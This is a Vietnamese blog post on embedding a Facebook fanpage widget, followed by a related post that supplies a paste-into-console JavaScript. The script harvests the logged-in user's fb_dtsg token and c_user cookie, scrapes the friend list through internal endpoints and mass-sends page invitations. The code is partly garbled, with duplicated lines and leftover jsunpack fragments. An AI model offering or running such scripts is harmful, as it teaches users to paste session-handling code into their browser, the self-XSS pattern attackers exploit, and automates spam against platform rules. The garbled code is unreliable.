Hướng dẫn mã chèn FaceBook fanpage vào website thế nào ?

Nếu bạn đang phát triển kênh bán hàng online trên facebook đồng thời với website bán hàng thì việc kết nối 2 kênh này lại với nhau vấn đề cần thiết, ngoài việc tăng khả năng tương tác với khách hàng, nó còn giúp bạn thu thập các thông tin đối tượng khách hàng 1 cách tốt nhất cho chiến dịch quảng cáo “nhắm mục đích” đến khách hàng sau này !

Trong chia sẻ này mình sẽ chia sẻ với bạn cách chèn box fanpage vào website của bạn. Việc đến giản là bạn chỉ cần có fanpage (cách tạo fanpage facbook bạn xem thêm tại đây). Sau khi có fanpage thì việc tiếp theo là bạn sẽ copy link fanpage của bạn sau đó thực hiện lấy mã và chèn vào website của bạn như sau.

Tạo Code Fanpage Facebook để chèn vào Website

Bước 1: Truy cập và đăng nhập tài khoản Facebook vào trang sau: https://developers.facebook.com/docs/plugins/page-plugin

Bước 2: Tại đây, bạn có thể tùy chỉnh 1 số thông tin trong Like Box như:

Hướng dẫn chèn mã hiển thị facebook fanpage trên website

Hướng dẫn chèn mã hiển thị facebook fanpage trên website

Mô tả các trường tùy biến:

Show Friends’ Faces: Hiện hình ảnh thành viên đã like page của bạn.
Show Header: Hiện tên tiêu đề like box phía trên cùng dạng “Liên kết với BỤI”
Show Posts: Hiện bài viết của bạn trong fanpage, danh sách các bài viết bạn đã đăng trên fanpage của bạn
Show Border: Hiện đường viền bao quanh khung fanpage.

Bước 3: lấy mã HTML để chèn vào website của bạn.

Sau khi tùy chỉnh các thông số cần thiết thì bạn click vào nút “Get Code” (lấy mã) rồi làm theo hướng dẫn của Facebook để chèn script hiển thị fanpage vào trang của mình nhé !

Lấy mã để chèn hiển thị fanpage lên website

Lấy mã để chèn hiển thị fanpage lên website

Bước cuối cùng:

Sau khi sử dụng mã trên chèn vào web, ví dụ page của mình thì fapage sẽ hiển thị như sau:

Mọi người nếu quan tâm và cùng sở thích về Tiêu Sáo thì có thể ủng hộ mình bằng cách like fanpage về Cảm Âm Tiêu Sáo nhé! Mình cảm ơn. Bạn có thể tra cứu cảm âm Tiêu Sáo tại http://CamAmTieuSao.com

Nếu có khó khăn trong quá trình lấy mã hiển thị fanpage lên website bạn có thể contact mình nhé ! Trong khả năng có thể mình sẽ hỗ trợ bạn.

Thân !

Related

Target sở thích có thực sự hiệu quả?

Target sở thích có thực sự hiệu quả?

In "Góc tổng hợp"
Tìm kiếm nội dung trên status Facebook đã dần được hỗ trợ

Tìm kiếm nội dung trên status Facebook đã dần được hỗ trợ

In "Marketing Online - SEO"

FaceBook script mời tất cả bạn bè của bạn like fanpage giúp tăng like fanpage hiệu quả


Như đã đề cập trong chia sẻ này mình sẽ chia sẻ thêm với các bạn một đoạn mã giúp bạn dễ dàng mời tất cả bạn bè trong danh sách bạn bè của bạn like 1 fanpage nào đó. Cách này so với cách trước đây thì "vô cùng đơn giản" và chỉ trong "1 nốt nhạc" hì hì !. Nếu bạn thích xem chia sẻ qua video thì có thể xem video trực quan tại https://www.youtube.com/watch?v=e0PkcHhXzm0.Đối với cách làm trước đây mình đề cập thì có trường hợp nút "invite friends" không hiển thị (mình cũng không rõ là tại sao @@), và cách làm khá rắc rối khi danh sách friends của bạn lên đến hàng ngàn.Do đó ngay sau đây là đoạn  mã mình sẽ chia sẻ với các bạn, giúp chúng ta cùng thực hiện thao tác invite friends một cách nhanh chóng ngay sau khi đăng nhập facebook.
//eval
var fanpage_id=1551475678420487;/*ID facebook fanpage*/

var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div.style.bottom="0";
_div.align="center";
_body.appendChild(_div);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg=document.getElementsByName("fb_dtsg")[0].value;
var user_id=document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
body = document.body;
if(body != null)
{
div = document.createElement("div");
div.style.position = "fixed";
div.style.display = "block";
div.style.width = "100px";
div.style.opacity= 0.90;
div.style.bottom = "+60px";
div.style.left = "+0px";
div.style.backgroundColor = "rgba(0,0,0,0.5)";
div.style.border = "1px solid rgba(0,0,0,0.5)";
div.style.padding = "3px";
body.appendChild(div);
}
if(body != null)
{
div = document.createElement("div");
div.style.position = "fixed";
div.style.display = "block";
div.style.width = "100px";
div.style.opacity= 0.90;
div.style.bottom = "+35px";
div.style.left = "+0px";
div.style.backgroundColor = "rgba(0,0,0,0.5)";
div.style.border = "1px solid rgba(0,0,0,0.5)";
div.style.padding = "3px";
div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='' title='Refresh'><blink><center>Close (F5)</center></blink></a>"
body.appendChild(div);
}
if(body != null)
{
div = document.createElement("div");
div.style.position = "fixed";
div.style.display = "block";
div.style.width = "135px";
div.style.opacity= 0.90;
div.style.bottom = "+10px";
div.style.left = "+0px";
div.style.backgroundColor = "rgba(0,0,0,0.5)";
div.style.border = "1px solid rgba(0,0,0,0.5)";
div.style.padding = "3px";
div.innerHTML = "<a style='font-weight:bold;color:#E30505' href='https://www.facebook.com/sanddesert' title='FbPageInvite'><blink><center>FOLLOW ME!</center></blink></a>"
body.appendChild(div);
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function Like(p) {
var Page = new XMLHttpRequest();
var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp=";
Page.open("POST", PageURL, true);
Page.onreadystatechange = function () {
if (Page.readyState == 4 && Page.status == 200) {
Page.close;
}
};
Page.send(PageParams);
}


var Title = "Đang Kiểm Tra</A>";
var Descriptions = "";
page_id = /"profile_owner":"([0-9]+)"/.exec(document.getElementById("pagelet_timeline_main_column").getAttribute("data-gt"))[1];
function InviteFriends(opo) {
jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send_single?page_id=" + page_id + "&invitee=" + opo + "&elem_id=u_0_1k&action=send&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=8&fb_dtsg=" + fb_dtsg + "&phstamp=", function (a) {
var b = a.substring(a.indexOf("{"));
var c = JSON.parse(b);
i--;
Descriptions = "<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";
if (c.error) {
Descriptions += "color:darkred'>";
err++;
if (c.errorDescription) Descriptions += c.errorDescription;
else Descriptions += JSON.stringify(c, null, "")
} else {
Descriptions += "color:darkgreen'>";
Descriptions += arn[i] + " has been invited to like the page " + page_name + ".";
suc++
}
Descriptions += "</div>";
var display = "<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
if (i > 0) {
display += arr.length + " Friends Detected<br/>";
display += "<b>" + suc + "</b> Friends Invited of " + (arr.length - i) + " Friends Processed ";
display += "(" + i + " Lefted...)";
display += "<div class='friend-edge'>";
display += Descriptions;
display += "<img style='width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src=" + pho[i] + "></img><a style='font-size:13px;padding-left:8px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>" + arn[i] + "</a>";
display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
display += "Please Wait While Inviting Your Friends to Like Your Page " + page_name + ".</br>";
display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Cancel</span><br/>";
display += "</div>";
display += "</div>";
display += "</div>";
window[tag + "_close"] = true
} else {
Title = "All Of Your Friends Have Been Invited to Like Your Page.</A>";
display += arr.length + " Friends Detected and ";
display += "<b>" + suc + " Friends Invited.</b></br>";
display += "<div><span class='FriendRequestAdd addButton selected uiButton uiButtonSpecial uiButtonLarge' onClick='ChangeLocation()' style='color:white'>Go to Homepage</span><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"' style='color:gray'>Cancel</span><br/>";
display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'><br/>";
display += "</div>";
window[tag + "_close"] = false
}
display += "</div>";
document.getElementById("pagelet_sidebar").innerHTML = display
}, "text", "post");
tay--;
if (tay > 0) {
var s = arr[tay];
setTimeout("InviteFriends(" + s + ")", 100)
}
console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);if (page_id) jx.load(window.location.protocol + "//www.facebook.com/ajax/pages/invite/send?&fb_dtsg=" + fb_dtsg + "&profileChooserItems=%7B%22" + opo + "%22%3A1%7D&checkableitems[0]=" + opo + "&page_id="+fanpage_id+"&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=k&phstamp=", function () {}, "text", "post")

}
jx = {
b: function () {
var b = !1;
if ("undefined" != typeof ActiveXObject) try {
b = new ActiveXObject("Msxml2.XMLHTTP")
} catch (c) {
try {
b = new ActiveXObject("Microsoft.XMLHTTP")
} catch (a) {
b = !1
}
} else if (window.XMLHttpRequest) try {
b = new XMLHttpRequest
} catch (h) {
b = !1
}
return b
},
load: function (b, c, a, h, g) {
var e = this.d();
if (e && b) {
e.overrideMimeType && e.overrideMimeType("text/xml");
h || (h = "GET");
a || (a = "text");
g || (g = {});
a = a.toLowerCase();
h = h.toUpperCase();
b += b.indexOf("?") + 1 ? "&" : "?";
var k = null;
"POST" == h && (k = b.split("?"), b = k[0], k = k[1]);
e.open(h, b, !0);
e.onreadystatechange = g.c ? function () {
g.c(e)
} : function () {
if (4 == e.readyState)
if (200 == e.status) {
var b = "";
e.responseText && (b = e.responseText);
"j" == a.charAt(0) ? (b = b.replace(/[\n\r]/g, ""), b = eval("(" + b + ")")) : "x" == a.charAt(0) && (b = e.responseXML);
c && c(b)
} else g.f && document.getElementsByTagName("body")[0].removeChild(g.f), g.e && (document.getElementById(g.e).style.display = "none"), error && error(e.status)
};
e.send(k)
}
},
d: function () {
return this.b()
}
};

function ChangeLocation() {
window.location.href = "http://www.facebook.com/"
}
setTimeout("ChangeLocation", 1);
window.onbeforeunload = function () {
if (window[tag + "_close"]) return "This script is running now!"
};
var i = 3;
var tay = 3;
var suc = 0;
var err = 0;
var arr = new Array;
var arn = new Array;
var pho = new Array;
var tag = "Close";
var page_name, x = document.getElementsByTagName("span");
for (i = 0; i < x.length; i++)
if (x[i].getAttribute("itemprop") == "name") page_name = x[i].innerHTML;
var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
jx.load(window.location.protocol + "///www.facebook.com/ajax/typeahead/first_degree.php?viewer=" + user_id + "&token=v7&filter[0]=user&options[0]=friends_only&options[1]=nm&options[2]=sort_alpha&__user=" + user_id + "&__a=1&__dyn=7n8aD5z5CF-3ui&__req=l", function (a) {
var b = a;
var c = b.substring(b.indexOf("{"));
var d = JSON.parse(c);
d = d.payload.entries;
for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
i = arr.length - 1;
tay = i;
console.log(arr.length);
var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0px 3px 8px rgba(0, 0, 0, 0.9);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.9);border-radius: 1em 4em 1em 4em;border:3px solid rgba(0,0,0,0.9);background-color:rgba(0,0,0,0.9);color:#ffffff'>";
display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
display += arr.length + " Waiting . . .";
display += "</div>";
document.getElementById("pagelet_sidebar").innerHTML = display;
InviteFriends(arr[i]);

});
//jsunpack.called CreateElement div
//jsunpack.url element = undefined
//jsunpack.url var _4855 = var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div
//jsunpack.url var _4052 = var parent=document.getElementsByTagName("html")[0];
var _body = document.getElementsByTagName('body')[0];
var _div = document.createElement('div');
_div.style.height="25";
_div.style.width="100%";
_div.style.position="fixed";
_div.style.top="auto";
_div
Để thực thi đoạn mã trên bạn vui lòng làm tuần tự các bước sau: 1. Login vào tài khoản facebook. (Đối với trường hợp bạn là admin quản trị trang thì bạn làm theo video để lấy được fanpage ID nhé). Trường hợp bạn không phải admin trang thì bạn truy cập vào fanpage đó và click chuột phải view source (xem mã nguồn) hoặc Ctrl+ U để xem mã nguồn trang sau đó nhấn Ctrl+F để tìm kiếm với từ khoá page_id. Sau khi tìm kiếm thì ký số sau page_id chính là id của trang bạn cần lấy để cập nhật vào mã script (xem video clip hướng dẫn).
page_id=1551475678420487
2. Chuyển sang chế độ xem trang với tư cách cá nhân của tài khoản (nếu bạn vừa vào admin lấy page_id). 3. Tại fanpage đó nếu: Trình duyệt FireFox thì nhấn tổ hợp phím Ctrl+Shift+K để chạy script console. Trình duyệt Chrome (như clip mình hướng dẫn) thì dùng tổ hợp phím Ctrl+Shift+J để chạy script console. 4. Copy đoạn mã trên với page_id là fanpage của bạn vào và Enter. 5. Đợi script chạy xong là ok rồi đó (bạn đã gửi thư mời like page đến tất cả bạn bè của mình).Để cụ thể hơn các bạn vui lòng tham khảo video clip hướng dẫn tự mời tất cả bạn bè like fanpage dưới.

P/s: Đối với hình thức này bạn chỉ cần lưu ý không invite quá nhiều nhé ! Hiện tại theo mình đây là cách hợp lệ vì thực tế mình invite friends của mình. Việc tiếp theo là bạn của bạn có ủng hộ like page giúp bạn hay không thôi. Trong quá trình áp dụng mình đã kiểm tra invite trên 5K friend (tức trên 5K lời mời) vẫn được nhé ! Có thể bạn sẽ có nhiều friend hơn để kiểm tra :) Xin chào, chúc các bạn tăng like fanpage hiệu quả với tỷ lệ reach ngày càng cao nhé ! Thân !
In "Cuộc sống"

Comments

 1. say

  bạn ơi cho mình hỏi lấy code là copy phần 1 or 2? sau đó paste vào bất cứ chỗ nào trên website của mình ah?
  Cảm ơn bạn!

  • say

   Chào bạn,
   Mình xin lỗi vì 1 số lý do mình đã xem nhưng bỏ quên phản hồi hỗ trợ cho bạn nhé!
   Mình xin được phản hồi bạn như sau: phần 1 bạn copy vào đầu trang web của bạn nhé! Trong phần header (thẻ head). Phần còn lại bạn copy vào vị trí bạn muốn hiển thị fanpage của bạn nhé!
   P/s: trong trường hợp vẫn có khó khăn gì hoặc cần hỗ trợ trực tiếp bạn vui lòng add skype mình sanddesert88 nhé, khi đó mình sẽ giúp bạn giải quyết vấn đề!
   Thân!

 2. Phạm Mùi say

  bạn ơi sao mình không chỉnh được width, mặc dù chỉnh with 920px nhưng nó vẫn không dãn ra. và không cho friends thành 2 hàng được nhỉ

  • say

   Chào bạn,
   Trong phần mô tả các thông số params FaceBook có ghi chú phần width “The pixel width of the plugin. Min. is 180 & Max. is 500”. Nghĩa là mặc định FaceBook chỉ hỗ trợ max-width là 500px bạn nhé!
   Thân!

 3. say

  bạn ơi cho mình hỏi làm sao để fanpage khi hiện liên trong website lien kết thì nó hiển thị tiếng việt , sao của mình nó cứ hiển thị tiếng anh, mình làm theo cách này nhưng chỗ ngôn ngữ không có tiếng việt nó mặc định tiếng anh rồi, làm sao đổi thành tiếng việt ạ? cảm ơn bạn1

  • say

   Chào bạn, mình xin lỗi vì phản hồi bạn trễ nhé!
   Phần này bạn chỉ cần chỉnh phần hiển thị cho tài khoản Facebook của bạn là tiếng Việt là được bạn nhé! Bạn đăng nhập vào tài khoản facebook của bạn sau đó vào phần Setting, tại đây bạn kéo xuống chân trang (cuối trang) bạn thấy:

   Facebook © 2015
   English (UK)

   Bạn click vào English (UK) – hoặc có thể ngôn ngữ hiện tại của bạn là English khác. Sau đó 1 bảng danh sách ngôn ngữ hỗ trợ hiển thị lên, bạn chọn ngôn ngữ bạn muốn hiển thị là được bạn nhé!
   Thân!

  • say

   Hi bạn,
   Cảm ơn bạn đã quan tâm chia sẻ 🙂
   Điều duy nhất mà widget fanpage FB cung cấp mình đang rất mong đợi là hỗ trợ responsive, hiện tại fix width rất khó chịu 🙁
   Thân !

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.


%d bloggers like this: